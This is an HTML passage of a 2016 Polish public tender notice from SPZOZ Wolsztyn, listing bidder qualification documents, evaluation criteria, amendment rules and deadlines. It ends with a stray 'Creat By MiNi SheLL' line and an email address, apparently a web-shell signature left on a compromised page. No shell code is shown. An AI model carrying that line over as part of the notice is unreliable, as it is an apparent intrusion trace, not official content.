<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony zgodnie z treścią i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ lub dokument sporządzony wg jego wzoru, 
b)	wskazanie części zamówienia, której wykonawca zamierza zlecić podwykonawcy - załącznik nr 7,
c)	w przypadku podmiotów występujących wspólnie pełnomocnictwo do złożenia oferty lub złożenia oferty i podpisania umowy w sprawie zamówienia publicznego. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania, oraz wymieniać wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia,
d)	w przypadku, gdy upoważnienie do podpisania oferty nie wynika z dokumentów rejestrowych do oferty należy załączyć stosowne pełnomocnictwo do złożenia oferty. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania, 
e)	Metodyka realizacji zamówienia- szczegółowo opisana w punkcie XVI ust. 4.2,
g)Kopię licencji (lub inne potwierdzenie posiadania prawa dysponowania oprogramowaniem) w zakresie oprogramowania wskazanego w ust. 1. pkt 1.1. dla co najmniej 2 stanowisk. 
h) Kopię licencji (lub inne potwierdzenie posiadania) prawa dysponowania oprogramowaniem w zakresie oprogramowania wskazanego w ust. 1. pkt 1.2.,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - metodyka realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana istotnych postanowień niniejszej Umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach, na zasadach wskazanych w niniejszym paragrafie. 
14.2	Zmiana może obejmować:
-zmiana terminu wykonania umowy spowodowana przedłużaniem wykonywania robót budowlanych objętych nadzorem z powodów niedotyczących wykonawcy, a zdeterminowanych takimi okolicznościami jak w szczególności: zmiana dokumentacji projektowej, zmiana sposobu wykonania zamówienia na roboty budowlane, niemożność wykonywania robót budowlanych z powodu warunków atmosferycznych, potwierdzonych wpisem w dzienniku budowy na warunkach określonych w umowie z Generalnym wykonawca robót budowlanych, koniecznością wykonania robót dodatkowych lub zamiennych, wystąpieniem siły wyższej.
-wynagrodzenia wykonawcy w przypadku zmiany urzędowej stawki podatku VAT - w takiej  sytuacji cena netto z oferty pozostanie niezmienna, natomiast cena brutto zostanie obliczona z uwzględnieniem nowej stawki podatku VAT
-zajdzie potrzeba wprowadzenia podwykonawcy lub podwykonawcy na etapie wykonywania umowy,
-zmiana personelu wykonawcy

14.3	  Nie stanowi istotnej zmiany Umowy:
zmiana danych związanych z obsługą administracyjno-organizacyjną umowy;
14.3.1	zmiana danych teleadresowych; 
14.3.2	 zmiana formy zabezpieczenia należytego wykonania umowy;
14.3.3	zmiana osób, o których mowa w par. 13 Umowy,
i nie wymagają aneksu do Umowy, ale będą sporządzone i potwierdzone przez Strony na piśmie.
14.4.	Zmiany Umowy, o których mowa w par. 2 Umowy, wymagają zgody obu Stron dokonanej w formie pisemnej i muszą być dokonane poprzez sporządzenie zmiany do Umowy - Aneksu.
14.5	   W przypadku uzgodnienia zmiany terminu realizacji Umowy Wykonawcy nie przysługuje prawo do ubiegania się o jakikolwiek zwrot kosztów z tego tytułu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozwolsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ w Wolsztynie, ul. Wschowska 3, 64-200 Wolsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 12:45, miejsce: SPZOZ w Wolsztynie, ul. Wschowska 3, 64-200 Wolsztyn; Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com